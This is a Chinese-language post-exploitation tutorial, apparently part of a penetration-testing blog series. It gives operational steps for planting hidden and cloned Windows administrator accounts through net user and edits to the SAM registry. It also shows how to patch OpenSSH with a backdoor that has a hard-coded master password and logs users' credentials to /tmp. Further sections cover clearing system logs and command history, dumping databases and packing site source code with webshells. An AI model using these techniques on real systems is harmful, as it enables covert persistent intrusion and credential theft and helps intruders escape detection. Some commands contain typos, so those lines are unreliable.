后滲透
留后門,方便下次入侵
清理痕跡
資料庫脫庫測驗
原始碼打包
Windows后門安裝
賬號后門(用戶后門)
LPK后門(程式后門)
木馬后門(程式后門)
賬號后門
net user
net user a$ a /add
net localgrop administrators a /add
support_338945ao 克隆賬號 1、先設定密碼
打開注冊表 regedit
HKET_LOCAL_MACHINE-ASM-SAM-Domains-User-Name
找到管理員,打開管理員的F值,全復制
找到要克隆的賬號,打開F值,全選粘貼替換掉
為什么要克隆賬號
1、首次,在一個用戶登錄計算機時,會在c:\Documents and settings里面有記錄
即創建一個賬號遠程登錄后,會創建一個家目錄,
但克隆后的賬號登錄后并不會有這種情況,
LPK后門
生成LPK.dll
木馬后門
Linux安裝后門
tar zxvf openssh-5.9p1.tar.gz
tar zxvf Ox06-0penssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后門
vi includes.h //修改后門密碼,記錄檔案位置
/*
+#define ILOG “/tmp/ilog” //記錄登錄到本機的用戶名和密碼
+#define OLOG “/tmp/olog” //記錄本機登錄到遠程的用戶名和密碼
+#define SECRETPW “123456321” //后門密碼
*/
先安裝所需環境
yum install –y openssl openssl-devel pam-devel
./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5
注意,要是出現:
configure:error:*** zlib.h missing –please install first or check config.log
需要安裝zlib
yum install –y zlib zlib-devel //http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download
需要make clean
make && make install //編譯和安裝
serrice sshd restart //重啟sshed
然后登錄
Windows系統日志清除
掃描/訪問日志-都是和網站進行互動-記錄在訪問日志
上傳后門-看檔案日期
我的電腦-管理-事件查看器-安全性-審核成功
網站日志-網站-屬性-日志
檔案目錄
Linux系統日志清除
歷史命令
訪問日志:
ls /var/log/httpd/access_log
ls /etc/httpd/logs/access_log
原始碼打包
asp+access
asp+sqlserver
大馬中的服務器打包
脫庫
菜刀、大馬、脫褲馬、、、
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/57053.html
標籤:其他
上一篇:Burpsuite—滲透測驗神器
下一篇:滲透測驗學習 二十七、內網滲透